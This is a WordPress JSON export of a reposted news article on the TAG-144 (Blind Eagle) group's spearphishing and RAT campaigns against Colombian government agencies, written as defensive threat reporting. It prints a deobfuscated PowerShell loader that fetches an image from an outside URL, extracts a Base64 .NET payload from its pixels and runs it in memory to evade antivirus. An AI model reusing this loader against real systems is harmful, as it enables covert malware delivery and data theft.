{"id":6488,"date":"2025-08-28T10:04:12","date_gmt":"2025-08-28T10:04:12","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/08\/28\/tag-144-actors-attacking-government-entities-with-new-tactics-techniques-and-procedures\/"},"modified":"2025-08-28T10:04:12","modified_gmt":"2025-08-28T10:04:12","slug":"tag-144-actors-attacking-government-entities-with-new-tactics-techniques-and-procedures","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/08\/28\/tag-144-actors-attacking-government-entities-with-new-tactics-techniques-and-procedures\/","title":{"rendered":"TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures"},"content":{"rendered":"<p>    TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n    <!-- no image --><br \/>\n \t<BR><br \/>\n<BR><\/BR><\/p>\n<div>\n<p>Over the past year, a shadowy threat actor known as TAG-144\u2014also tracked under aliases Blind Eagle and APT-C-36\u2014has intensified operations against South American government institutions.<\/p>\n<p>First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, REMCOS RAT, and XWorm, often delivered through highly targeted spearphishing campaigns masquerading as official judicial or tax notifications.<\/p>\n<p>In mid-2025, Recorded Future analysts noted a significant uptick in activity, with five distinct clusters deploying new infrastructure and exploiting legitimate internet services to stage malware payloads.<\/p>\n<p>Initial access typically leverages compromised or <a href=\"https:\/\/cybersecuritynews.com\/hackers-launch-business-email-compromise-attacks-on-the-automotive-industry\/\" target=\"_blank\" rel=\"noreferrer noopener\">spoofed email<\/a> accounts from local government agencies, luring users into opening malicious documents or SVG attachments.<\/p>\n<p>These attachments often contain embedded JavaScript that, when executed, retrieves a second-stage loader from services like Paste.ee or Discord\u2019s CDN.<\/p>\n<p>Recorded Future researchers <a href=\"https:\/\/www.recordedfuture.com\/research\/tag-144s-persistent-grip-on-south-american-organizations\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">identified<\/a> numerous compromised Colombian government email addresses used to send deceptive legal summonses, illustrating the adversary\u2019s ability to blend social engineering with technical subterfuge.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEgDhvuP6T5yL6d0dHWbJjw3l0a292T6POtI8TQX5uTmJnvKwYbTrXaYDShcxePKpajokmuxiXJw67usOO2NwGGmp2AStvQNMpdemJGoZm2VUPIkBepIpJD_L24ajz3EDzD3p0ki432i2qvBOiZIaWwgFXdoJP2LqY1-6gmp1h8bm20wc3LLT3xQY25Wujs\/s16000\/Phishing%2520pages%2520linked%2520to%2520Cluster%25204%2520%28Source%2520-%2520Recordedfuture%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Phishing pages linked to Cluster 4 (Source \u2013 Recordedfuture)<\/figcaption><\/figure>\n<\/div>\n<p>The impact of TAG-144\u2019s <a href=\"https:\/\/cybersecuritynews.com\/incorporating-cybersec-credentials-into-marketing-campaigns\/\" target=\"_blank\" rel=\"noreferrer noopener\">campaigns<\/a> has been most severe in Colombia\u2019s federal and municipal agencies, where exfiltration of credentials and sensitive data poses both espionage and financial extortion risks.<\/p>\n<p>Despite sharing core tactics across clusters\u2014dynamic DNS domains, open-source RATs, and stolen crypters\u2014the group\u2019s evolving use of steganography and domain generation algorithms (DGAs) marks a notable shift toward more resilient operations.<\/p>\n<p>Recorded Future analysts noted that this evolution not only complicates traditional defenses but also underscores the blurred line between cybercrime and state-level espionage.<\/p>\n<h2 class=\"wp-block-heading\" id=\"h-infection-mechanism-and-steganographic-payload-extraction\"><strong>Infection Mechanism and Steganographic Payload Extraction<\/strong><\/h2>\n<p>One of TAG-144\u2019s most sophisticated techniques involves embedding a Base64-encoded .NET assembly within the pixel data of a benign JPEG image hosted on Archive[.]org.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEi09D7jDVjvAPKI5IlM8IO0n9orwgaLATXjRmwH3CMoi4eAbDzrx69d9-7tZJpSf8yfU9d6ZaM7aBbqhwWo1_Ar15RQeMGaGP7p4t07CvN4na45ePKGmLhwoTuPpGVS6dOxrgYjeMS67jhFPrHRB0es1vvL8GOCpkzYLqAgSQwSQ6crKK9oK9JWgbt_DRc\/s16000\/Payload%2520hosted%2520on%2520archive%255B.%255Dorg%2520URL%2520%28Source%2520-%2520Recordedfuture%29.webp?ssl=1\" alt=\"\"><figcaption class=\"wp-element-caption\">Payload hosted on archive[.]org URL (Source \u2013 Recordedfuture)<\/figcaption><\/figure>\n<\/div>\n<p>Upon execution of the initial PowerShell script, the loader scans for a predefined byte marker before extracting and invoking the payload directly in memory, bypassing disk writes and evading <a href=\"https:\/\/cybersecuritynews.com\/avast-antivirus-vulnerability\/\" target=\"_blank\" rel=\"noreferrer noopener\">antivirus<\/a> detection.<\/p>\n<p>For example, the deobfuscated PowerShell segment responsible for this process appears as:<\/p>\n<pre class=\"wp-block-code\"><code>$tormodont = 'https:\/\/archive.org\/download\/universe-...\/universe.jpg'\n$sclere = New-Object System.Net.WebClient\n$sclere.Headers.Add('User-Agent','Mozilla\/5.0')\n$sorority = $sclere.DownloadData($tormodont)\n# Identify marker and extract embedded bytes\n$splenoncus = $sorority[$markerIndex..($sorority.Length - 1)]\n$stream = New-Object IO.MemoryStream\n$stream.Write($splenoncus, 0, $splenoncus.Length)\n$bitmap = [Drawing.Bitmap]::FromStream($stream)\n# Reconstruct payload from pixel data\nforeach ($y in 0..($bitmap.Height-1)) {\n  foreach ($x in 0..($bitmap.Width-1)) {\n    $color = $bitmap.GetPixel($x,$y)\n    $bytesList.Add($color.R); $bytesList.Add($color.G); $bytesList.Add($color.B)\n  }\n}\n$payloadBytes = [Convert]::FromBase64String($bytesList[4..($length+3)] -join '')\n[Reflection.Assembly]::Load($payloadBytes).EntryPoint.Invoke($null,$args)<\/code><\/pre>\n<p>This in-memory injection, coupled with dynamic domain resolution\u2014often leveraging services like duckdns.org and noip.com\u2014ensures that the RAT\u2019s command-and-control infrastructure remains agile and difficult to trace.<\/p>\n<p>By avoiding traditional executable downloads and utilizing steganography, TAG-144 demonstrates an advanced understanding of both detection evasion and asset staging, posing a <a href=\"https:\/\/cybersecuritynews.com\/detecting-and-responding-to-new-nation-state-persistence-techniques\/\" target=\"_blank\" rel=\"noreferrer noopener\">persistent<\/a> threat to government networks across the region.<\/p>\n<p class=\"has-text-align-center has-background\" style=\"background:linear-gradient(180deg,rgb(238,238,238) 90%,rgb(169,184,195) 100%)\"><strong><code>Boost\u00a0your\u00a0SOC and help your team protect your business with free top-notch threat intelligence:\u00a0<a href=\"https:\/\/intelligence.any.run\/plans\/?utm_source=csn&amp;utm_medium=article&amp;utm_campaign=alert_fatigue&amp;utm_content=lookup_plan&amp;utm_term=120825\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Request TI Lookup Premium Trial<\/a>.<\/code><\/strong><\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/tag-144-actors-attacking-government-entities\/\">TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p> \t<BR><br \/>\n <BR><\/BR><br \/>\n    Tushar Subhra Dutta<br \/>\n \t<BR><br \/>\n<BR><\/BR><br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/tag-144-actors-attacking-government-entities\/\">Go to cyber-security-news<\/a><br \/>\n \t<BR><br \/>\n <BR><\/BR><\/p>\n","protected":false},"excerpt":{"rendered":"<p>TAG-144 Actors Attacking Government Entities With New Tactics, Techniques, and Procedures Over the past year, a shadowy threat actor known as TAG-144\u2014also tracked under aliases Blind Eagle and APT-C-36\u2014has intensified operations against South American government institutions. First observed in 2018, this group has adopted an array of commodity remote access trojans (RATs) such as AsyncRAT, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,649],"tags":[130],"class_list":["post-6488","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-threats","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/6488"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=6488"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/6488\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=6488"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/categories?post=6488"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=6488"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}